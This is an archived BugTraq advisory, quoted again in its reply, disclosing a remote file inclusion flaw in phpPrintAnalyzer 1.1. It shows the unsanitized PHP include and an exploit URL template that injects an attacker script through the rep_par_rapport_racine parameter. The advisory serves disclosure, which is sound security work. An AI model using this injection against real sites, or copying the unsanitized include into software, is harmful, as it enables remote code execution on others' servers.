BugTraq
Back to list
|
Post reply
phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability
Aug 07 2006 08:19PM
sh3ll sh3ll ir
(1 replies)
------------------------------------------------------------------------
---------------
phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion
------------------------------------------------------------------------
---------------
Author : Sh3ll
Date : 2006/04/27
Location : Iran - Tehran
HomePage : http://www.sh3ll.ir
Email : sh3ll[at]sh3ll[dot]ir
Critical Level : Dangerous
------------------------------------------------------------------------
---------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : phpPrintAnalyzer
version : 1.1
URL : http://tpequet.free.fr/phpPrintAnalyzer
Description :
phpPrintAnalyzer is a Web Application for CUPS System to Analyze
the "page_log" Files and Get HTML Graphics (with JpGraph)
------------------------------------------------------------------------
---------------
Vulnerability:
~~~~~~~~~~~~~
in index.php We Found Vulnerability Script
----------------------------------------index.php-----------------------
---------------
....
<?php
include($rep_par_rapport_racine."inc/img.inc.php");
?>
...
------------------------------------------------------------------------
---------------
Exploit:
~~~~~~~
http://www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racin
e=[Evil Script]
Solution:
~~~~~~~~
Sanitize Variabel $rep_par_rapport_racine in index.php
------------------------------------------------------------------------
----------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friends Atena & N4sh3n4s
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
[ reply ]
Re: phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability
Aug 14 2006 07:26PM
Carsten Eilers (ceilers-lists gmx de)
Privacy Statement
Copyright 2010, SecurityFocus
---------------
phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion
------------------------------------------------------------------------
---------------
Author : Sh3ll
Date : 2006/04/27
Location : Iran - Tehran
HomePage : http://www.sh3ll.ir
Email : sh3ll[at]sh3ll[dot]ir
Critical Level : Dangerous
------------------------------------------------------------------------
---------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : phpPrintAnalyzer
version : 1.1
URL : http://tpequet.free.fr/phpPrintAnalyzer
Description :
phpPrintAnalyzer is a Web Application for CUPS System to Analyze
the "page_log" Files and Get HTML Graphics (with JpGraph)
------------------------------------------------------------------------
---------------
Vulnerability:
~~~~~~~~~~~~~
in index.php We Found Vulnerability Script
----------------------------------------index.php-----------------------
---------------
....
<?php
include($rep_par_rapport_racine."inc/img.inc.php");
?>
...
------------------------------------------------------------------------
---------------
Exploit:
~~~~~~~
http://www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racin
e=[Evil Script]
Solution:
~~~~~~~~
Sanitize Variabel $rep_par_rapport_racine in index.php
------------------------------------------------------------------------
----------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friends Atena & N4sh3n4s
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
[ reply ]